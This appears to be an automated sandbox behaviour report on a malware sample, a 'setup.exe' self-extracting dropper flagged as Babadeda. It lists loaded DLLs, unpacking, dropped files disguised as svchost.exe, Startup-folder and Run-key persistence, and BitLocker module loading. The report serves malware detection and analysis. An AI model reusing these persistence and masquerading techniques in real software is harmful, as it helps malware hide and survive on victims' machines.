        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: setup.exeStatic file information: File size 30661632 > 1048576
        Source: setup.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1d0fc00
        Source: Binary string: D:\Projects\WinRAR\SFX\build\sfxrar64\Release\sfxrar.pdb source: setup.exe, 00000000.00000002.1782894473.0000000004B87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1692339333.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp

        Data Obfuscation

        barindex
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Temp\tg.exeUnpacked PE file: 4.2.tg.exe.400000.0.unpack
        Yara detected Babadeda
        Source: Yara matchFile source: 4.2.tg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.tg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tg.exe, type: DROPPED
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040A83A LoadLibraryW,GetProcAddress,wcscpy,wcscat,wcslen,CoTaskMemFree,FreeLibrary,wcscat,wcslen,4_2_0040A83A
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\__tmp_rar_sfx_access_check_4463921Jump to behavior
        Source: svchost.exe.0.drStatic PE information: section name: .didat
        Source: tg.exe.0.drStatic PE information: section name: .code
        Source: client.exe.0.drStatic PE information: section name: .didata
        Source: client.exe.0.drStatic PE information: section name: .debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CC6358 pushad ; ret 1_2_04CC6361
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00412185 push ecx; ret 7_2_00412198
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00402A39 push ss; retf 7_2_00402A3A
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00423111 push 00002ADEh; mov dword ptr [esp], edi10_2_00423120
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00421928 push FFFFFFC5h; ret 10_2_00421927
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00412185 push ecx; ret 10_2_00412198
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00402A39 push ss; retf 10_2_00402A3A
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00424AFD push 0000117Fh; mov dword ptr [esp], ebx10_2_00424B02
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00423BDE push 000078BBh; mov dword ptr [esp], ecx10_2_00423BF7
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00421E7E push 00002ADEh; mov dword ptr [esp], edi10_2_00423120
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00422ED9 push 000011A0h; mov dword ptr [esp], eax10_2_004246A4
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00412185 push ecx; ret 18_2_00412198
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00402A39 push ss; retf 18_2_00402A3A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAACB20 pushad ; ret 23_2_00007FFD9BAACBB1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAACA58 pushad ; ret 23_2_00007FFD9BAACBB1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAA2035 push eax; iretd 23_2_00007FFD9BAA233D
        Source: svchost.exe.3.drStatic PE information: section name: .text entropy: 6.823487500781107
        Source: svchost.exe.3.drStatic PE information: section name: .data entropy: 7.15327780189184
        Source: svchost.exe.7.drStatic PE information: section name: .text entropy: 6.823487500781107
        Source: svchost.exe.7.drStatic PE information: section name: .data entropy: 7.15327780189184

        Persistence and Installation Behavior

        barindex
        Drops PE files with benign system names
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeJump to dropped file
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeFile created: C:\ProgramData\svchost\svchost.exeJump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\client.exeJump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\tg.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeJump to dropped file
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeFile created: C:\ProgramData\svchost\svchost.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeJump to dropped file
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeFile created: C:\ProgramData\svchost\svchost.exeJump to dropped file

        Boot Survival

        barindex
        Drops PE files to the startup folder
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\__tmp_rar_sfx_access_check_4463921Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\__tmp_rar_sfx_access_check_4463921Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
